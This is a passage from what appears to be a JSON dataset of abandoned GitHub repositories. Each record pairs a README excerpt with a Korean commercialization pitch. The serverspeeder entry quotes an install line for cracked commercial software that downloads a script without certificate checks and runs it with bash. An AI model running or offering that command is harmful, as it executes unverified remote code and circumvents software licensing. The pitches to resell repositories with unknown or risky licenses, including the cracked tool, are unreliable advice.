source products are still lacking, the transparency, configurability and reliability greatly outweighs the drawbacks for me.\r\n\r\nI also lost faith in humanity throughout the years I was actively maintaining the project. The influx of pings, bumps, repeating questions already answered in FAQ, and various other unreasonable demands without any givebacks was just astounding. Please do not contact me regarding this project as I have no desire ","composite_score":0.3419,"license_safety_tag":"safe"},{"name":"qiwsir/algorithm","github_url":"https://github.com/qiwsir/algorithm","stars":5,"language":"Python","license":"unknown","abandonment_months":48,"description":"# qiwsir/algorithm 상용화 분석\n\n## 왜 보물인가\n복잡한 문제를 빠르고 효율적으로 푸는 방법들을 모아둔 \"문제 해결 레시피 모음\"으로, 소프트웨어 개발 업계에서 필수적인 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 알고리즘 학습 과정을 체계화하여 온라인 코스나 부트캠프에 판매\n2. **기업 기술 면접 도구*","readme_excerpt":"\n如果要成为一个有一定水平的程序员，算法是必须要会的。算法，让你的程序变得更有灵气。\n\n这里集中了一些算法问题，供看官参考。\n\n也殷切盼望看官能够参与某些算法问题解决的优化。\n\n联系方式：qiwsir (at) gmail.com\n\n官方网站：http://qiwsir.github.io\n\n#目录\n\n- [对一个二维数组的操作](https://github.com/qiwsir/algorithm/blob/master/2d_list.md)，[源码](https://github.com/qiwsir/algorithm/blob/master/2d_list.py)\n- [将数组中的元素依次前移](https://github.com/qiwsir/algorithm/blob/master/ahead_one_step.md)，[源码](https://github.com/qiwsir/algorithm/blob/master/ahead_one_step.py)\n- [求list的平均分并排序](https://github.com/qiwsir/algorithm/blob/master/average_score.md)，[源码](https://github.com/qiwsir/algorithm/blob/master/average_score.py)\n- [用阿拉伯乘法解决大整数相乘问题](https://github.com/qiwsir/algorithm/blob/master/big_int.md)，[源码](https://github.com/qiwsir/algorithm/blob/master/big_int.py)\n- [二分查找的python模块](https://github.com/qiwsir/algorithm/blob/master/bin_search.md)，[源码](https://github.com/qiwsir/algorithm/blob/master/bin_search.py)\n- [二叉树查找之基本思想](https://github.com/qiwsir/algorithm/blob/master/binary_tree.md)，[源码](https://github.com/qi","composite_score":0.3418,"license_safety_tag":"unknown"},{"name":"anhkgg/SuperWeChatPC","github_url":"https://github.com/anhkgg/SuperWeChatPC","stars":11,"language":"C++","license":"unknown","abandonment_months":76,"description":"# SuperWeChatPC 분석 보고서\n\n## 왜 보물인가\nWeChat(중국의 카카오톡)을 컴퓨터에서 자동으로 관리할 수 있는 도구로, 중국 시장의 비즈니스 커뮤니케이션을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **중국 판매팀 자동 고객응대 SaaS**: 여러 WeChat 계정의 메시지를 한 곳에서 관리하고 자동 회신하는 구독 서비스\n2.","readme_excerpt":"\n# 概述\n\n`SuperWeChatPC`刚开始仅仅只是`PC`微信多开工具，后来慢慢增加了更多功能，感谢朋友们的支持。\n\n为了方便更多开发者能够在`PC`微信做更多有意义的事情，现改变项目方向，提供两个针对不同人群的功能。\n\n1. 普通用户依然可以直接使用原来的多开工具，直接下载可执行程序即可。~~[下载地址](https://github.com/anhkgg/SuperWeChatPC/archive/v1.1.3.zip)~~，详细使用方法请看[普通用户使用SuperWeChatPC](docs/normal.md)。(**请注意：** 由于微信更新，`2.6.8.52`以后，老版本`WeChat多开v0.0.1.exe`已经失效，请直接使用[sdk/SuperWechat.zip](https://github.com/anhkgg/SuperWeChatPC/raw/master/sdk/SuperWeChat.zip)，也可通过公众号获取。)\n2. 针对开发者，提供`WeChatSDK`，开放操作微信的各种接口，可以进行二次开发，具体使用方法请看[WeChatSDK开发指南](docs/sdk.md)。\n\n`SuperWeChatPC`支持功能：\n1. 全版本无限多开\n2. 消息防撤销，有撤销提示（`>=2.6.7.40`）\n3. 语音消息备份（`>=2.6.6.28`）\n4. 消息发送接口（`>=2.6.6.44`）\n5. 接受消息接口，3种消息（`>=2.6.7.40`)\n6. 新增：<font color=\"red\">**打破微信100M文件发送限制，支持任意大小文件发送（`>=2.6.8.65`）**</font>，使用方式见[更新日志](docs/update.md)。\n\n**`WeChatSDK`目前已经开放`C++`、`Python`、`Java`、`C#`接口。** 具体请看[WeChatSDK开发指南](docs/sdk.md)。\n\n更新详情请看[更新日志](docs/update.md)\n\n刚发布几天，发现在几个下载站出现了`SuperWeChatPC`的下载，特此加上编译好的文件`hash`信息，请下载后自行检查文件是否被修改。\n\n[hash信息](hash.txt)\n\n另外本项目仅在`github`发布，其他渠道下载的文件出现","composite_score":0.3418,"license_safety_tag":"unknown"},{"name":"j-delaney/easy-application","github_url":"https://github.com/j-delaney/easy-application","stars":5,"language":"","license":"mit","abandonment_months":28,"description":"# easy-application 저장소 분석\n\n## 왜 보물인가\n지원서나 신청서를 쉽게 만들고 관리할 수 있는 도구로, 복잡한 양식 작성 과정을 단순화합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 학원·학교의 수강신청 또는 입학지원 플랫폼으로 운영\n- **내부 업무 도구**: 회사 인턴·채용 지원서를 온라인으로 수집·관리하는 시스템\n- ","readme_excerpt":"# Easy Application\n\nHave you ever tried to apply for a company only to discover they won't let you upload your resume? Instead you have to meticulously fill out pages of information (all of which could be found on your resume).\n\nThis is a list of companies that are easy to apply to. These companies use a job application system that allows a candidate to focus on their application rather spend energy fighting bad UX (e.g. Jobvite, Lever, Greenhouse are all good systems). If the company uses a system that requires the candidate to manually input every field from their resume (e.g. Taleo and Brassring) they are not allowed on this list.\n\nPlease note that it is not encouraged to blindly apply to every company on this list. I made this list because I felt that the application process of a company is a reflection on their culture and internal processes. Every link is to the company's main career page so that you can spend some time learning about the company and making sure it's a good fit f","composite_score":0.3417,"license_safety_tag":"safe"},{"name":"lemire/simdjson","github_url":"https://github.com/lemire/simdjson","stars":8,"language":"C++","license":"apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"[![][license img]][license] [![][licensemit img]][licensemit]\n\n\n[![Doxygen Documentation](https://img.shields.io/badge/docs-doxygen-green.svg)](https://simdjson.github.io/simdjson/)\n\nsimdjson : Parsing gigabytes of JSON per second\n===============================================\n\n<img src=\"images/official_logo/logo_noir/SVG/logo_simdjson_noir.svg\" width=\"40%\" style=\"float: right\">\n\nJSON is everywhere on the Internet. Servers spend a *lot* of time parsing it. We need a fresh\napproach. The simdjson library uses commonly available SIMD instructions and microparallel algorithms\nto parse JSON 4x  faster than RapidJSON and 25x faster than JSON for Modern C++.\n\n* **Fast:** Over 4x faster than commonly used production-grade JSON parsers.\n* **Record Breaking Features:** Minify JSON  at 6 GB/s, validate UTF-8  at 13 GB/s,  NDJSON at 3.5 GB/s.\n* **Easy:** First-class, easy to use and carefully documented APIs.\n* **Strict:** Full JSON and UTF-8 validation, lossless parsing. Performance with no comp","composite_score":0.3416,"license_safety_tag":"safe"},{"name":"exercism/exercism.io","github_url":"https://github.com/exercism/exercism.io","stars":8,"language":"","license":"agpl-3.0","abandonment_months":27,"description":"# Exercism.io 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 일반인들이 무료로 실습하고 피드백을 받을 수 있는 교육 플랫폼으로, 전 세계 학습자들의 코딩 실력 향상을 돕는 검증된 학습 생태계입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 신입 직원을 위한 프로그래밍 기초 교육 플랫폼으로 제공\n2. **내부 업무","readme_excerpt":"**For support, please post in the new [Exercism forum](https://forum.exercism.org/c/support/8). New posts here will be closed.**\n\n---\n\n# Welcome to Exercism\n\n## Where to open issues\n\nFor the time being we are triaging all issues [from our forum](https://forum.exercism.org). Please start a new topic there for your issue (presuming there isn't one already). Issues opened here will be automatically closed and you will receive a message redirecting you to the forum.\n\n## Feeling uncomfortable?\n\nIf you need to report a code of conduct violation, please email us at [abuse@exercism.org](mailto:abuse@exercism.org?subject=%5BCoC%5D) and include \\[CoC\\] in the subject line. We will follow up with you as a priority.\n\n## Where to find the code\n\nThe code for the website lives in [exercism/website](http://github.com/exercism/website).\nThe code for the old website is in this repository, in the [v1.exercism.io](https://github.com/exercism/exercism/tree/v1.exercism.io) branch.\n\n## Who's behind Exercism?","composite_score":0.3416,"license_safety_tag":"risky"},{"name":"shadowsocksrr/shadowsocks-rss","github_url":"https://github.com/shadowsocksrr/shadowsocks-rss","stars":5,"language":"","license":"unknown","abandonment_months":106,"description":"# shadowsocks-rss 자산 평가\n\n## 왜 보물인가\n인터넷 접근을 자유롭게 해주는 오픈소스 기술로, 네트워크 제약이 있는 지역에서 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **VPN 서비스**: 개인 사용자를 위한 월정액 보안 통신 서비스\n2. **기업용 내부 도구**: 원격지 지사와 본사 간의 안전한 네트워크 연결 솔루션\n3. *","readme_excerpt":"# ShadowsocksR C# 版本4.8.0 #\n\nBitTorrent Sync：BHS55LP54SO7A434QBB5Z2O6B7A45B2BX  \n主页：[https://breakwa11.github.io/](https://breakwa11.github.io/)  \nWiki：[https://github.com/breakwa11/shadowsocks-rss/wiki](https://github.com/breakwa11/shadowsocks-rss/wiki)  \nZeroNet主页：[shadowsocksr.bit](http://127.0.0.1:43110/shadowsocksr.bit)  \nShadowsocksR主要分支：[SSR C#](https://github.com/shadowsocksr/shadowsocksr-csharp), [SSR python manyuser](https://github.com/shadowsocksr/shadowsocksr/tree/manyuser), [SSR-libev](https://github.com/shadowsocksr/shadowsocksr-libev)  \nAndroid APP: [SSR-android](https://github.com/shadowsocksr/shadowsocksr-android/releases)  \niOS APP： [Shadowrocket](https://itunes.apple.com/us/app/shadowrocket/id932747118), [Potatso2](https://download.potatso.com), [Cross](https://itunes.apple.com/cn/app/cross-shadowsocks-proxy-client/id1194595243)  \nMAC APP：[ShadowsocksX-NG](https://github.com/qinyuhang/ShadowsocksX-NG/releases), [ShadowsocksX-R](https://github.com/yichengchen/Shadowso","composite_score":0.3415,"license_safety_tag":"unknown"},{"name":"golang/dep","github_url":"https://github.com/golang/dep","stars":5,"language":"Go","license":"bsd-3-clause","abandonment_months":70,"description":"# golang/dep 분석 리포트\n\n## 왜 보물인가\nGo 언어 프로젝트에서 외부 라이브러리 버전을 자동으로 관리해주는 도구로, 수천 개의 소프트웨어 개발팀이 의존하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **Go 언어 개발 플랫폼 SaaS**: 클라우드 기반 IDE나 코딩 환경에서 이 도구를 기본 기능으로 탑재하여 개발자에게 제공\n2. ","readme_excerpt":"<p align=\"center\"><img src=\"docs/assets/DigbyShadows.png\" width=\"360\"></p>\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/golang/dep\"><img src=\"https://travis-ci.org/golang/dep.svg?branch=master\" alt=\"Build Status\"></img></a>\n  <a href=\"https://ci.appveyor.com/project/golang/dep\"><img src=\"https://ci.appveyor.com/api/projects/status/github/golang/dep?svg=true&branch=master&passingText=Windows%20-%20OK&failingText=Windows%20-%20failed&pendingText=Windows%20-%20pending\" alt=\"Windows Build Status\"></a>\n  <a href=\"https://goreportcard.com/report/github.com/golang/dep\"><img src=\"https://goreportcard.com/badge/github.com/golang/dep\" /></a>\n</p>\n\n## Dep\n\n`dep` is a dependency management tool for Go. It requires Go 1.9 or newer to compile.\n\n**NOTE:** Dep was an official experiment to implement a package manager for Go.\nAs of 2020, Dep is deprecated and archived in favor of Go modules, which have\nhad official support since Go 1.11. For more details, see https://golang.org/ref/mod.\n\nFor gui","composite_score":0.3413,"license_safety_tag":"safe"},{"name":"jeasonlzy/ImagePicker","github_url":"https://github.com/jeasonlzy/ImagePicker","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":68,"description":"# ImagePicker 저장소 분석\n\n## 왜 보물인가\n스마트폰에서 사진을 선택하는 기능을 쉽게 만들 수 있는 도구라, 사진 관련 앱 개발자들에게 개발 시간을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 앱 제공 회사**: 사용자가 피드에 사진을 올리는 기능 구현\n2. **전자상거래 플랫폼**: 판매자가 상품 사진을 여러 장 업로드하는 시","readme_excerpt":"# ImagePicker\nAndroid自定义相册，完全仿微信UI，实现了拍照、图片选择（单选/多选）、 裁剪 、旋转、等功能。\n\n### 由于个人时间有限，该项目停止维护\n如果你发现有bug，或者好的建议，可以提merge request，我测试通过后会立即合并并发布新版本，确保该库处于可用的状态。\n\n该项目参考了：\n\n* [https://github.com/pengjianbo/GalleryFinal](https://github.com/pengjianbo/GalleryFinal) \n* [https://github.com/easonline/AndroidImagePicker](https://github.com/easonline/AndroidImagePicker)\n\n喜欢原作的可以去使用。同时欢迎大家下载体验本项目，如果使用过程中遇到什么问题，欢迎反馈。\n\n## 联系方式\n * email： liaojeason@126.com\n * QQ群： 489873144 <a target=\"_blank\" href=\"//shang.qq.com/wpa/qunwpa?idkey=ba5dbb5115a165866ec77d96cb46685d1ad159ab765b796699d6763011ffe151\"><img border=\"0\" src=\"http://pub.idqqimg.com/wpa/images/group.png\" alt=\"Android 格调小窝\" title=\"Android 格调小窝\"></a>（点击图标，可以直接加入，建议使用QQ群，邮箱使用较少，可能看的不及时）\n * 如果遇到问题欢迎在群里提问，个人能力也有限，希望一起学习一起进步。\n \n## 演示\n ![image](https://github.com/jeasonlzy/Screenshots/blob/master/ImagePicker/demo1.png)![image](https://github.com/jeasonlzy/Screenshots/blob/master/ImagePicker/demo2.gif)\n ![image](https://github.com/jeasonlzy/Screenshots/blob/m","composite_score":0.3413,"license_safety_tag":"safe"},{"name":"Hearst-DD/ObjectMapper","github_url":"https://github.com/Hearst-DD/ObjectMapper","stars":5,"language":"Swift","license":"mit","abandonment_months":25,"description":"# ObjectMapper 저장소 분석\n\n## 왜 보물인가\n서로 다른 형식의 데이터를 자동으로 변환해주는 도구로, 복잡한 데이터 변환 작업을 간단하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 통합 SaaS**: 여러 사업용 소프트웨어(CRM, 회계 프로그램 등)의 데이터를 한곳에서 관리하는 서비스\n2. **기업 내부 도구**: 엑셀 ","readme_excerpt":"ObjectMapper\n============\n[![CocoaPods](https://img.shields.io/cocoapods/v/ObjectMapper.svg)](https://github.com/tristanhimmelman/ObjectMapper)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Swift Package Manager](https://rawgit.com/jlyonsmith/artwork/master/SwiftPackageManager/swiftpackagemanager-compatible.svg)](https://swift.org/package-manager/)\n[![Build Status](https://travis-ci.org/tristanhimmelman/ObjectMapper.svg?branch=master)](https://travis-ci.org/tristanhimmelman/ObjectMapper)\n\nObjectMapper is a framework written in Swift that makes it easy for you to convert your model objects (classes and structs) to and from JSON. \n\n- [Features](#features)\n- [The Basics](#the-basics)\n- [Mapping Nested Objects](#easy-mapping-of-nested-objects)\n- [Custom Transformations](#custom-transforms)\n- [Subclassing](#subclasses)\n- [Generic Objects](#generic-objects)\n- [Mapping Context](#mapping-context)\n- [Obj","composite_score":0.3413,"license_safety_tag":"safe"},{"name":"91yun/serverspeeder","github_url":"https://github.com/91yun/serverspeeder","stars":5,"language":"Shell","license":"unknown","abandonment_months":90,"description":"# 91yun/serverspeeder 분석\n\n## 왜 보물인가\n인터넷 속도를 빠르게 만들어주는 기술로, 느린 네트워크 환경에서도 빠른 서비스 경험을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 글로벌 고객들을 위한 속도 최적화 솔루션으로 월 구독형 서비스 제공\n2. **내부 업무 도구**: 대기업의 느린 지점(支店)과 본","readme_excerpt":"# serverspeeder锐速一键破解安装版\n本锐速一键破解安装会在[91yun.co我的博客](http://www.91yun.co/archives/683)持续发布更新，请大家关注\n\n破解版锐速linux一键自动安装包在本贴持续更新，大家可以加收藏夹，以后有更新都会在这个文章同步。\n\n本破解锐速是是无限带宽版的，破解版锐速的一些代码将逐步开源在github这里。\n\n锐速破解版自动安装过程中有什么问题都可以留言，我尽量解答。\n\n# 特别说明\n另外：重要的事情说三遍！！！\n\n锐速不支持Openvz！！！锐速不支持Openvz！！！锐速不支持Openvz！！！\n\n### 你可能需要：\n* 如果你不知道你的机子到底是不是Openvz，请食用[《教程：一键检测VPS是Openvz还是KVM还是Xen》](http://www.91yun.co/archives/836)\n* 如果你的内核不对，是Centos的话请食用[《教程：CentOS更换内核，提供锐速可用的内核下载》](http://www.91yun.co/archives/795)。debian和ubuntu我不熟，暂时还没一键包，请自行百度google。。\n* 如果你想知道一些服务器是否适合你，请食用 各种[评测报告](http://www.91yun.co/?s=%E8%AF%84%E6%B5%8B)。我每天都会把我尝试的一些vps评测报告发出来，大家可以收藏好本站，及时关注。\n\n\n# 锐速破解版安装方法：\n    wget -N --no-check-certificate https://github.com/91yun/serverspeeder/raw/master/serverspeeder.sh && bash serverspeeder.sh\n# 锐速破解版卸载方法：\n    chattr -i /serverspeeder/etc/apx* && /serverspeeder/bin/serverSpeeder.sh uninstall -f\n\n\n锐速破解版功能：\n如果内核完全匹配就会自动下载安装。\n如果没有完全匹配的内核，会在界面提示可选内核，可以手动选个最接近的尝试\n自动下载授权文件\n自动修改配置文件\n已chattr +i /serverspeeder/etc/apx*禁止修改配置","composite_score":0.3412,"license_safety_tag":"unknown"},{"name":"Olical/aniseed","github_url":"https://github.com/Olical/aniseed","stars":5,"language":"Fennel","license":"Unlicense","abandonment_months":12,"description":"# Olical/aniseed 상업화 분석\n\n## 왜 보물인가\n프로그래머들이 복잡한 코드 작업을 자동화할 수 있는 실용적인 도구로, 개발 시간을 크게 단축해줄 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 협업 도구 SaaS**: 팀 단위 프로그래머들이 함께 사용하는 클라우드 기반 편집 서비스로 월 구독료 수익화\n2. **개발사 내부 도","readme_excerpt":"= Aniseed https://discord.gg/wXAMr8F[image:https://img.shields.io/discord/732957595249410108.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2[Discord]]\n\nAniseed bridges the gap between https://fennel-lang.org/[Fennel] (a Lisp that compiles to Lua) and https://neovim.io/[Neovim]. Allowing you to easily write plugins or configuration in a https://clojure.org/[Clojure]-like Lisp with great runtime performance.\n\n____\nNote: You may be interested in my new project that attempts to be a successor to Aniseed, https://github.com/Olical/nfnl[nfnl].\n\nIt does away with a bunch of decisions I regretted and builds upon the parts I really liked. I think you might like it too!\n\nFuture development efforts will center around nfnl instead of Aniseed and things like Conjure will almost certainly transition over to being based on it instead over time.\n____\n\nhttps://asciinema.org/a/326401[image:https://asciinema.org/a/326401.svg[asciicast]]\n\nFurther documentation can be found in link:","composite_score":0.341,"license_safety_tag":"unknown"},{"name":"gcp/leela-zero","github_url":"https://github.com/gcp/leela-zero","stars":10,"language":"C++","license":"gpl-3.0","abandonment_months":25,"description":"# gcp/leela-zero 분석\n\n## 왜 보물인가\n컴퓨터가 바둑을 인간처럼 배우고 강해지는 기술로, 게임·교육·전략 분석 분야에 혁신을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 바둑 플랫폼에서 AI 대국 상대 또는 실력 진단 기능 제공\n- **내부 업무 도구**: 바둑 학원/동호회에서 학생 실력 분석 및 맞춤","readme_excerpt":"[![Linux Build Status](https://travis-ci.org/leela-zero/leela-zero.svg?branch=next)](https://travis-ci.org/leela-zero/leela-zero)\n[![Windows Build Status](https://ci.appveyor.com/api/projects/status/dcvp31x1e0yavrtf/branch/next?svg=true)](https://ci.appveyor.com/project/gcp/leela-zero-8arv1/branch/next)\n\n# What\n\nA Go program with no human provided knowledge. Using MCTS (but without\nMonte Carlo playouts) and a deep residual convolutional neural network stack.\n\nThis is a fairly faithful reimplementation of the system described\nin the Alpha Go Zero paper \"[Mastering the Game of Go without Human Knowledge](https://www.nature.com/articles/nature24270.epdf?author_access_token=VJXbVjaSHxFoctQQ4p2k4tRgN0jAjWel9jnR3ZoTv0PVW4gB86EEpGqTRDtpIz-2rmo8-KG06gqVobU5NSCFeHILHcVFUeMsbvwS-lxjqQGg98faovwjxeTUgZAUMnRQ)\".\nFor all intents and purposes, it is an open source AlphaGo Zero.\n\n# Wait, what?\n\nIf you are wondering what the catch is: you still need the network weights.\nNo network weights are in this r","composite_score":0.3408,"license_safety_tag":"restricted"},{"name":"lennylxx/ipv6-hosts","github_url":"https://github.com/lennylxx/ipv6-hosts","stars":5,"language":"Python","license":"mit","abandonment_months":50,"description":"# lennylxx/ipv6-hosts 분석 보고서\n\n## 왜 보물인가\n인터넷을 사용할 때 웹사이트 접속을 빠르고 안정적으로 해주는 주소록 역할을 하는 파일로, 많은 사람들이 필요로 하지만 직접 관리하기는 복잡한 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 인터넷 속도 최적화 서비스로 월 구독형으로 자동 업데이트 제공\n2. **내부","readme_excerpt":"What\n----\n\nHosts file which is used for improving IPv6 access speed to Google, YouTube, \nFacebook, Wikipedia, etc. in Mainland China.\n\n|   \\   |                                                                    |\n| ----- | ------------------------------------------------------------------ |\n| Hosts | https://raw.githubusercontent.com/lennylxx/ipv6-hosts/master/hosts |\n| Wiki  | https://github.com/lennylxx/ipv6-hosts/wiki                        |\n| Info  | [1e100 servers deployment geoinfo], [SN-domain servers list]       |\n\n* You may need [HTTPS Everywhere] to secure your transmission.\n* [How to decode Google SN domains]\n* How to [Do It Yourself]\n\nScripts\n-------\n\n[update_hosts.py]\n\n```\nusage: update_hosts [OPTIONS] FILE\nA simple multi-threading tool used for updating hosts file.\n\nOptions:\n  -h, --help             show this help message and exit\n  -s DNS                 set another dns server, default: 2001:4860:4860::8844\n  -o OUT_FILE            output file, default: inputfilename.o","composite_score":0.3407,"license_safety_tag":"safe"},{"name":"google/cameraview","github_url":"https://github.com/google/cameraview","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":77,"description":"# google/cameraview 기술 가치 분석\n\n## 왜 보물인가\n구글이 직접 만든 스마트폰 카메라 제어 기술로, 앱 개발자들이 복잡한 카메라 기능을 쉽게 구현할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 사진 편집 앱이나 비디오 통화 플랫폼에서 카메라 기능을 빠르게 통합\n2. **내부 업무 도구**:","readme_excerpt":"# Deprecated\n\nCameraView is deprecated. No more development will be taking place.\n\nUse [Jetpack CameraX](https://developer.android.com/jetpack/androidx/releases/camerax) instead.\n\n# CameraView\n\nThis is not an official Google product.\n\nCameraView aims to help Android developers easily integrate Camera features.\n\nRequires API Level 9. The library uses Camera 1 API on API Level 9-20 and Camera2 on 21 and above.\n\n| API Level | Camera API | Preview View |\n|:---------:|------------|--------------|\n| 9-13      | Camera1    | SurfaceView  |\n| 14-20     | Camera1    | TextureView  |\n| 21-23     | Camera2    | TextureView  |\n| 24        | Camera2    | SurfaceView  |\n\n## Features\n\n- Camera preview by placing it in a layout XML (and calling the start method)\n- Configuration by attributes\n  - Aspect ratio (app:aspectRatio)\n  - Auto-focus (app:autoFocus)\n  - Flash (app:flash)\n\n## Usage\n\n```xml\n<com.google.android.cameraview.CameraView\n    android:id=\"@+id/camera\"\n    android:layout_width=\"match_pare","composite_score":0.3407,"license_safety_tag":"safe"},{"name":"qinyuhang/ShadowsocksX-NG-R","github_url":"https://github.com/qinyuhang/ShadowsocksX-NG-R","stars":9,"language":"","license":"unknown","abandonment_months":74,"description":"","readme_excerpt":"Remove due to regulation\n","composite_score":0.3406,"license_safety_tag":"unknown"},{"name":"green7ea/cpp-compilation","github_url":"https://github.com/green7ea/cpp-compilation","stars":6,"language":"C++","license":"MIT","abandonment_months":11,"description":"# cpp-compilation 저장소 분석\n\n## 왜 보물인가\n프로그래밍 입문자들이 가장 어려워하는 \"코드를 실행 가능한 프로그램으로 만드는 과정\"을 쉽게 배우고 실습할 수 있는 교육용 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 초보자 대상 유료 강좌나 코딩 부트캠프에서 필수 커리큘럼으로 판매\n2. **기업 내부 ","readme_excerpt":"# Blogs\n\n- `2024-01` — [Typing Interfaces](./interface-typing/README.md)\n- `2018-11` — [C++ Build Process](./cpp-build-process/README.md)\n","composite_score":0.3406,"license_safety_tag":"safe"},{"name":"google/guetzli","github_url":"https://github.com/google/guetzli","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":38,"description":"# Google Guetzli 분석 보고서\n\n## 왜 보물인가\n사진과 이미지를 더 작은 파일 크기로 만들면서도 품질을 유지하는 기술로, 웹사이트 속도 개선이 필요한 모든 비즈니스에 핵심 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진 공유 플랫폼이나 클라우드 저장소에서 사용자의 저장 용량을 늘려주는 자동 압축 기능 제공\n- ","readme_excerpt":"<p align=\"center\"><img src=\"https://cloud.githubusercontent.com/assets/203457/24553916/1f3f88b6-162c-11e7-990a-731b2560f15c.png\" alt=\"Guetzli\" width=\"64\"></p>\n\n# Introduction\n\nGuetzli is a JPEG encoder that aims for excellent compression density at high\nvisual quality. Guetzli-generated images are typically 20-30% smaller than\nimages of equivalent quality generated by libjpeg. Guetzli generates only\nsequential (nonprogressive) JPEGs due to faster decompression speeds they offer.\n\n[![Build Status](https://travis-ci.org/google/guetzli.svg?branch=master)](https://travis-ci.org/google/guetzli)\n\n# Building\n\n## On POSIX systems\n\n1.  Get a copy of the source code, either by cloning this repository, or by\n    downloading an\n    [archive](https://github.com/google/guetzli/archive/master.zip) and\n    unpacking it.\n2.  Install [libpng](http://www.libpng.org/pub/png/libpng.html).\n    If using your operating system\n    package manager, install development versions of the packages if the\n    distinc","composite_score":0.3401,"license_safety_tag":"safe"},{"name":"jpush/aurora-imui","github_url":"https://github.com/jpush/aurora-imui","stars":9,"language":"Java","license":"mit","abandonment_months":41,"description":"# jpush/aurora-imui 분석 보고서\n\n## 왜 보물인가\n채팅 앱처럼 메시지를 주고받는 인터페이스를 쉽게 만들 수 있는 도구라서, 고객 상담 서비스나 메신저 기능이 필요한 모든 앱에 적용할 수 있습니다.\n\n## 어디에 팔 수 있나\n\n**1. 고객 상담 서비스 (SaaS)**\n- 쇼핑몰, 은행, 병원 등에서 고객과 직원이 실시간으로 대화할 수 있는","readme_excerpt":"[![tag](https://img.shields.io/badge/tag-0.4.7-blue.svg)](https://github.com/jpush/imui/releases)\n[![support](https://img.shields.io/badge/support-iOS%20%26%20Android-brightgreen.svg)]()\n[![QQ Group](https://img.shields.io/badge/QQ%20Group-604798367-red.svg)]()\n\n# Aurora IMUI\n[中文文档](./README_zh.md)\n\nAurora IMUI is a general IM UI components library, which does not depend on any specific IM SDK.\n\nThis library provides common UI components such as MessageList, InputView. It supports common message type, such as text, image, audio, video, etc. By default it has several UI style for choice, and also supports style customization.\n\nWe already have Android/iOS/React Native platforms support.\n\nAlready supports three main platforms: Android, iOS, React Native.\n\nPlease refer to [aurora-imui-examples](https://github.com/jpush/aurora-imui-examples) for more examples.\n\n<p align=\"center\">\n    <a target=\"_blank\">\n        <img src=\"https://github.com/huangminlinux/resource/blob/master/IMUIPick%402x.pn","composite_score":0.3399,"license_safety_tag":"safe"},{"name":"waiting-for-dev/web_pipe","github_url":"https://github.com/waiting-for-dev/web_pipe","stars":5,"language":"Ruby","license":"unknown","abandonment_months":17,"description":"# waiting-for-dev/web_pipe 분석\n\n## 왜 보물인가\n웹 개발자들이 반복적으로 하는 작업을 자동화할 수 있는 도구로, 개발 시간을 크게 단축시킬 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발사 내부 도구**: 프로젝트 관리자나 개발팀이 일반적인 웹 개발 작업을 자동으로 처리하도록 커스터마이징해 업무 효율을 높임","readme_excerpt":"[![Gem Version](https://badge.fury.io/rb/web_pipe.svg)](https://badge.fury.io/rb/web_pipe)\n[![Build Status](https://travis-ci.com/waiting-for-dev/web_pipe.svg?branch=master)](https://travis-ci.com/waiting-for-dev/web_pipe)\n\n# WebPipe\n\n`web_pipe` is a builder of composable rack applications through a pipe of\nfunctions on an immutable struct.\n\n> `web_pipe` plays incredibly well with `hanami 2`. If you want to create a\n> `hanami 2` app with `web_pipe`, you can take inspiration from this sample todo\n> application:\n>\n> https://github.com/waiting-for-dev/hanami_2_web_pipe_todo_app\n\n1. [Introduction](docs/introduction.md)\n1. [Design model](docs/design_model.md)\n1. [Building a rack application](docs/building_a_rack_application.md)\n1. [Plugging operations](docs/plugging_operations.md)\n   1. [Resolving operations](docs/plugging_operations/resolving_operations.md)\n   1. [Injecting operations](docs/plugging_operations/injecting_operations.md)\n   1. [Composing operations](docs/plugging_operations/c","composite_score":0.3399,"license_safety_tag":"unknown"},{"name":"devopshydclub/emartapp","github_url":"https://github.com/devopshydclub/emartapp","stars":115,"language":"TypeScript","license":"NOASSERTION","abandonment_months":29,"description":"","readme_excerpt":"","composite_score":0.3394,"license_safety_tag":"unknown"},{"name":"ogiansouza/minhas-tarefas","github_url":"https://github.com/ogiansouza/minhas-tarefas","stars":14,"language":"TypeScript","license":"NOASSERTION","abandonment_months":28,"description":"","readme_excerpt":"","composite_score":0.3391,"license_safety_tag":"unknown"},{"name":"Meituan-Dianping/walle","github_url":"https://github.com/Meituan-Dianping/walle","stars":18,"language":"Java","license":"apache-2.0","abandonment_months":24,"description":"# Meituan-Dianping/walle 분석 보고서\n\n## 왜 보물인가\n중국 최대 배달앱 회사인 미투안(美团)이 만든 모바일 앱 배포 도구로, 앱 업데이트를 더 빠르고 안전하게 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 회사의 배포 자동화 서비스**: 스타트업 앱 개발사에 배포 시간 단축 솔루션을 SaaS로 제공\n2. **게","readme_excerpt":"# 